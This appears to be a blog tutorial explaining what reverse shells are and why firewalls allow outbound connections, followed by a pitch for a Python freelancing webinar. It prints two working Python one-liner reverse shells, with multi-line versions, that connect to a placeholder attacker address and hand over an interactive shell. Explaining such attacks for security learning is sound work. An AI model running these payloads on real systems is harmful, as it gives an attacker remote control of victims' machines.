This article will be fun! You’ll learn about an important concept in security: reverse shells. You’ll also learn how to create reverse shells in Python in a single line of code. So, let’s start with the big question:
What is a Reverse Shell?
Here’s the definition of a Reverse Shell:
A reverse shell is used by hackers to gain access to a target machine. The target machine opens a shell to communicate to the attacking machine. The attacking machine receives the connection (listening on a given port) and is now able to access the target computer. To accomplish a reverse shell, a hacker must execute code on a target machine. Reverse shells are also used by security engineers to test and prevent reverse shell attacks.
The reason for a reverse shell is simple: it’s often very hard for an attacker to gain access to a target machine because both the target’s machine and the in-network firewall carefully protect the user from incoming connections. Arguably, this is necessary because hackers from all over the world constantly try to force their way into your machine (if it is accessible via the Internet).
However, it’s almost impossible for the same firewalls to protect the client from outgoing connections. You can only do so by restricting the (potential) target to perform these operations. But system administrators and programmers must be able to open ports and communicate to other machines via TCP connections. This is what computers are here for after all.
A reverse shell utilizes this and reverses the standard way to get access to a target machine. Now, the target opens up the connection to the attacker so firewalls will often allow these connections assuming the owner of the target machine knows what they’re doing.
The only thing the attacker must do is to get the target to execute the code on their machine, open up a reverse shell and connect to the attacker’s machine. The attacker opens a port on their own machine and wait for the client to connect to this port.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
But you should never execute code that’s copy&pasted from an Internet source. What if the code removes all files from your computer?
Let’s have a look at how this code looks like as a Python multi-liner so that you can understand it better:
import socket,subprocess,os s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.0.0.1",1234)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Kali-IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
When writing the equivalent multi-liner, the code looks more understandable:
import pty import socket,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("Kali-IP",443)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) pty.spawn("/bin/bash")
It’s very similar to the above code but uses the
pty library to create the shell.
Where to Go From Here?
Enough theory, let’s get some practice!
To become successful in coding, you need to get out there and solve real problems for real people. That’s how you can become a six-figure earner easily. And that’s how you polish the skills you really need in practice. After all, what’s the use of learning theory that nobody ever needs?
Practice projects is how you sharpen your saw in coding!
Do you want to become a code master by focusing on practical code projects that actually earn you money and solve problems for people?
Then become a Python freelance developer! It’s the best way of approaching the task of improving your Python skills—even if you are a complete beginner.
Join my free webinar “How to Build Your High-Income Skill Python” and watch how I grew my coding business online and how you can, too—from the comfort of your own home.